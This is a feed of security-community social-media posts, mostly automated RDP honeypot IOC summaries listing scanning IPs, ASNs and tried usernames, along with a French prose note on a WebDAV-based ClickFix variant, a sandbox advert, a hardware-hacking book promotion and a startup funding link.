RDP Snitch17h ago

2026-03-21 RDP #Honeypot IOCs - 261 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
103.9.207.80 - 108
143.110.190.12 - 30
80.94.95.88 - 18

Top ASNs:
AS135905 - 108
AS396982 - 39
AS14061 - 30

Top Accounts:
hello - 144
Test - 36
Domain - 18

Top ISPs:
SUNSOFT - 108
Google LLC - 39
DigitalOcean, LLC - 30

Top Clients:
Unknown - 261

Top Software:
Unknown - 261

Top Keyboards:
Unknown - 261

Top IP Classification:
Unknown - 180
hosting - 75
proxy - 6

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key

#CyberSec #SOC #Blueteam #SecOps #Security

RDP Snitch17h ago

2026-03-21 RDP #Honeypot IOCs - 174 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
103.9.207.80 - 72
143.110.190.12 - 20
80.94.95.88 - 12

Top ASNs:
AS135905 - 72
AS396982 - 26
AS14061 - 20

Top Accounts:
hello - 96
Test - 24
Domain - 12

Top ISPs:
SUNSOFT - 72
Google LLC - 26
DigitalOcean, LLC - 20

Top Clients:
Unknown - 174

Top Software:
Unknown - 174

Top Keyboards:
Unknown - 174

Top IP Classification:
Unknown - 120
hosting - 50
proxy - 4

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key

#CyberSec #SOC #Blueteam #SecOps #Security

RDP Snitch17h ago

2026-03-21 RDP #Honeypot IOCs - 87 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
103.9.207.80 - 36
143.110.190.12 - 10
80.94.95.88 - 6

Top ASNs:
AS135905 - 36
AS396982 - 13
AS14061 - 10

Top Accounts:
hello - 48
Test - 12
Domain - 6

Top ISPs:
SUNSOFT - 36
Google LLC - 13
DigitalOcean, LLC - 10

Top Clients:
Unknown - 87

Top Software:
Unknown - 87

Top Keyboards:
Unknown - 87

Top IP Classification:
Unknown - 60
hosting - 25
proxy - 2

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key

#CyberSec #SOC #Blueteam #SecOps #Security

 decio22h ago

Tiens, jolie trouvaille pour la saison de chasse 👀

Nouvelle évolution très graphique de #ClickFix, qui s’appuie cette fois sur WebDAV pour délivrer le payload. (!)

Ça change un peu des chaînes directes habituelles en PowerShell / MSHTA / WScript : ici, l’accès initial passe par >net use, montage du partage distant, exécution du batch comme un fichier local, puis démontage.

Cible : Windows uniquement.

Le move est intéressant : moins de dépendance aux interpréteurs/lolbins ultra-monitorés, et un abus de WebDAV qui peut passer plus discrètement si ce n’est pas surveillé.

Source du finding Daniel
👇
https://www.linkedin.com/posts/daniel-b1_clickfix-webdav-atos-ugcPost-7441043660613398528-98ey

Analyse Atos
👇
https://atos.net/en/lp/cybershield/investigating-a-new-click-fix-variant

Pour ceux qui veulent enrichir la détection / le blocage :
la petite liste à zigouiller dans vos firewalls et filtres DNS
👇
https://threatfox.abuse.ch/browse/tag/WebDav/

Et en bonus : recette de chasse / pivot en image via Onyphe.

Et en bonus : recette de chasse / pivot en image via #Onyphe.

#CyberVeille #WebDav #blueteam

BrightByteLabs1d ago

ThreatLab routes all sandbox traffic through dedicated WireGuard exit nodes across the US, UK, Germany, and Spain. Kill switch prevents IP leaks if the tunnel drops. Your real IP never touches the malware's C2.

threatlabsandbox.com

#dfir #blueteam #malwareanalysis #infosec #sigma #sysmon #incidentresponse #blueteam

RDP Snitch1d ago

2026-03-20 RDP #Honeypot IOCs - 411 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
193.26.115.213 - 174
103.9.207.80 - 111
167.71.102.165 - 30

Top ASNs:
AS210558 - 174
AS135905 - 111
AS14061 - 45

Top Accounts:
hello - 147
Administrator - 87
Admin - 87

Top ISPs:
1337 Services GmbH - 174
SUNSOFT - 111
DigitalOcean, LLC - 45

Top Clients:
Unknown - 411

Top Software:
Unknown - 411

Top Keyboards:
Unknown - 411

Top IP Classification:
proxy - 180
Unknown - 147
hosting - 81

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key

#CyberSec #SOC #Blueteam #SecOps #Security

RDP Snitch1d ago

2026-03-20 RDP #Honeypot IOCs - 274 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
193.26.115.213 - 116
103.9.207.80 - 74
167.71.102.165 - 20

Top ASNs:
AS210558 - 116
AS135905 - 74
AS14061 - 30

Top Accounts:
hello - 98
Administrator - 58
Admin - 58

Top ISPs:
1337 Services GmbH - 116
SUNSOFT - 74
DigitalOcean, LLC - 30

Top Clients:
Unknown - 274

Top Software:
Unknown - 274

Top Keyboards:
Unknown - 274

Top IP Classification:
proxy - 120
Unknown - 98
hosting - 54

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key

#CyberSec #SOC #Blueteam #SecOps #Security

RDP Snitch1d ago

2026-03-20 RDP #Honeypot IOCs - 137 scans
Thread with top 3 features in each category and links to the full dataset
#DFIR #InfoSec

Top IPs:
193.26.115.213 - 58
103.9.207.80 - 37
167.71.102.165 - 10

Top ASNs:
AS210558 - 58
AS135905 - 37
AS14061 - 15

Top Accounts:
hello - 49
Administrator - 29
Admin - 29

Top ISPs:
1337 Services GmbH - 58
SUNSOFT - 37
DigitalOcean, LLC - 15

Top Clients:
Unknown - 137

Top Software:
Unknown - 137

Top Keyboards:
Unknown - 137

Top IP Classification:
proxy - 60
Unknown - 49
hosting - 27

Pastebin links with full 24-hr RDP Honeypot IOC Lists:
Bad API request, invalid api_dev_key

#CyberSec #SOC #Blueteam #SecOps #Security

Tobias Scheible2d ago

Selbst die beste IT-Sicherheitsarchitektur nützt wenig, wenn jemand einfach ein manipuliertes Ladekabel einsteckt. Genau dieses Problem war mein Antrieb für „𝗛𝗮𝗰𝗸𝗶𝗻𝗴 𝗛𝗮𝗿𝗱𝘄𝗮𝗿𝗲”, eine Übersetzung meines deutschsprachigen Buches „𝗛𝗮𝗿𝗱𝘄𝗮𝗿𝗲 & 𝗦𝗲𝗰𝘂𝗿𝗶𝘁𝘆”. In der Cybersicherheit konzentrieren wir uns stark auf Netzwerke und Software, aber der physische Angriffsvektor wird oft fatal unterschätzt.

In meinem neuen englischsprachigen 𝗕𝘂𝗰𝗵 zeige ich euch praktisch und detailliert, wie diese Angriffe funktionieren und wie man sich davor schützt. 🧰

Egal, ob ihr im Red Team seid und euer Arsenal erweitern wollt oder im Blue Team arbeitet und diese Vektoren verstehen müsst – dieses englischsprachige Buch liefert euch die Praxis. 🛠️

#RedTeam #BlueTeam #KeystrokeInjection #SDR #InfoSec #CyberSecurity #Hard

Bill2d ago

Probably just vaporware but I wanna take a look juuuuust in case.

https://www.securityweek.com/raven-emerges-from-stealth-with-20-million-in-funding/

#cloud #blueteam

Raven Emerges From Stealth With $20 Million in Funding

Cybersecurity startup Raven has emerged from stealth mode with $20 million in funding to protect applications at runtime.

SecurityWeek